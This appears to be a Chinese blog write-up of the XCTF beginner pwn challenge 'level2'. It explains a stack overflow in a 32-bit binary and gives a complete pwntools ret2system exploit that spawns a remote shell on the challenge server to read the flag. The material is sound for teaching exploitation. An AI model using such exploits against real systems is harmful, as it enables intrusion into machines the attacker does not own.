攻防世界新手区level2

字数:390字 | 预计阅读时长:1分钟

[攻防世界]新手区level2

先看文件属性,知道是32位程序
先checksec查看文件

开启了NX,没法用shellcode,但是没有栈保护,可以直接栈溢出
用32位IDA打开,先看字符串窗口,看看有没有可以直接利用的字符串
在这里插入图片描述
发现有system和/bin/sh可以利用,猜测需要溢出覆盖system函数参数,使其变成system(“/bin/sh”)来获取shell
再看main函数,没有什么疑点,点进vulnerable_function函数看看
在这里插入图片描述
发现buf长度为0x88,但read了0x100,且并没有输入限制,存在溢出漏洞

思路:

  1. 填充字符使buf溢出
  2. 溢出后将read函数的返回地址覆盖为system的地址,进入我们构造的伪栈帧
  3. 覆盖system的参数,使其变为”/bin/sh”
  4. 拿到shell,然后寻找flag

    EXP:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
elf = ELF('./level2')
sys_addr = elf.symbols['system'] #获取system函数地址
binsh_addr = elf.search('/bin/sh').next() #获取'/bin/sh'字符串的地址

payload = 'a'*140 + p32(sys_addr) + p32(0x1111) + p32(binsh_addr)

sh = remote('111.198.29.45',57892)
sh.recvline()
sh.sendline(payload)
sh.interactive()

payload解释:

  1. ‘a’*140:由于buf长0x88(十进制为136),且32位程序ebp长0x4(十进制为4),所以总共要填充140个字符
  2. p32(sys_addr):覆盖read的返回地址,使其变成system函数地址
  3. p32(0x1111):用于覆盖system的函数返回地址,由于system(“bin/sh”)执行完后会直接拿到shell,所以随便填一个地址即可
  4. p32(binsh_addr):字符串地址,system的参数

拿到shell以后,只需要ls看看有没有flag文件,如果有,直接cat flag就能拿到flag

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */